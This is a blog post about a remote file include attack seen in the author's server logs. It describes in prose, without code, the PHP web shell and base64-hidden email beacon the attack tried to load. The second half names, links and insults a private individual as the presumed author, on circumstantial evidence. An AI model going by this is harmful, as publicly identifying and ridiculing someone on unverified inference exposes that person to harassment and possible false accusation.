My webserver got a strange looking request earlier. In fact, it got two identical ones within 10 minutes of each other. One came from America, one came from Moldova, but upon further inspection, both are running web servers, and the user agent in both is ‘libwww-perl/5.805’, so they likely fell prey to the same attack and are now being used to propagate it to other sites. Turns out it was trying to perform a remote include exploit, so naturally, I had a look at exactly what it was trying to include. It tries to pull in a php script which implements a file upload and shell interface (via system()), which, if successful would give an attacker a fair amount of control over the server. Upon successfully including itself, it would email somebody a little message with the server details. The author was a little sensitive about this and he hid that code behind a base64 string and evaled() it. The email address was hidden inside that as yet another base64 string (as if I’m going to decode the first one then suddenly forget how to do it?), and it was:
If you Google it, it belongs to an Indoneasian called Bambang Ariyanto, or BaMbY. Bamby’s not really the kind of smooth operator you’d expect such a leet haxor to be. You’d expect him to be using a throwaway email address and he’d connect to it a couple of times a week through Tor or something. If he’s sensitive enough to double-base64 encode identity information, you’d think he’d be keeping a low profile. Not so. Instead, he’s using what appears to be his personal email that he has registered elsewhere. He’s got social networking profiles and photos all over the place. About 10 minutes after I saw my server logs, I’d found his full name, location and several photos of him. In fact, you could say he’s a bit of an eejit.
I know what you’re thinking; maybe he just had his email hacked, and it’s not really him? It seems pretty unlikely. On his http://buahkata.blogspot.com/ blog, he has talked about free software and ReactOS [if you use Chrome it’ll translate it for you]. On his http://b4mby.multiply.com/ Multiply he has a link to http://www.securityfocus.com/, a site listing recent security vulnerabilities in software. We also have a posting here by someone called BaBmY, linking to a geocities (yahoo) account called ‘bamby002a’ (check the email address), in which he’s sharing an extraordinarily ineffiecient md5 brute forcer written in Perl, even though you could put together a much faster implementation in C in fewer lines.
Here’s his website: http://www.bamby.web.id/
there’s nothing there, but feel free to click it so he sees this in the referrer.
Bamby Ariyanto: you sir, are an idiot.